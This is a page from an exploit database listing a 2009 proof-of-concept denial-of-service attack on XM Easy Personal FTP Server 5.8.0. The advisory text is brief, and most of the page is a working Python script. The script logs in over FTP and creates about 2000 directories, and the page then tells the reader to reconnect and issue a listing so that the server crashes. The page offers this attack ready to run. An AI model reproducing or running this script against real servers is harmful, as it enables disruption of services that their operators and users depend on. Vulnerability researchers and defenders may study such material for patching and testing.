[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability

Author
leinakesi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9793
Category
dos / poc
Date add
24-11-2009
Platform
unsorted
==========================================================
XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability
==========================================================


# Title: XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability
# CVE-ID: ()
# OSVDB-ID: ()
# Author: leinakesi
# Published: 2009-11-24
# Verified: yes

view source
print?
Date of Discovery: 24-Nov-2009
 
Vendor: Dxmsoft
*******************************************************************************
Affected:
 
        XM Easy Personal FTP Server 5.8.0
        Earlier versions may also be affected
*******************************************************************************
Overview:
 
        XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
 
the root directory.
*******************************************************************************
Details:
 
        if you could log on the server, take the following steps and the server will
 
crash which lead to DoS.
         
        1.upload 2000 files or folders.
        2.close the current connection.
        3.use a ftp client to reconnect the server.
                user ...
                pass ...
                port ...
                list ...
                crash!!!!!!
*******************************************************************************
Exploit example:
 
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
 
def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
 
    for i in range(1,200):
         sock.send("mkd " + "a" * i +"\r\n")
         print "[-] " + ("mkd " + "a" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "b" * i +"\r\n")
         print "[-] " + ("mkd " + "b" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "c" * i +"\r\n")
         print "[-] " + ("mkd " + "c" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "d" * i +"\r\n")
         print "[-] " + ("mkd " + "d" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "e" * i +"\r\n")
         print "[-] " + ("mkd " + "e" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "f" * i +"\r\n")
         print "[-] " + ("mkd " + "f" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "g" * i +"\r\n")
         print "[-] " + ("mkd " + "g" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "h" * i +"\r\n")
         print "[-] " + ("mkd " + "h" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "i" * i +"\r\n")
         print "[-] " + ("mkd " + "i" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "j" * i +"\r\n")
         print "[-] " + ("mkd " + "j" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
 
    sock.close()
    sys.exit(0);
 
2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir



#  0day.today [2024-12-25]  #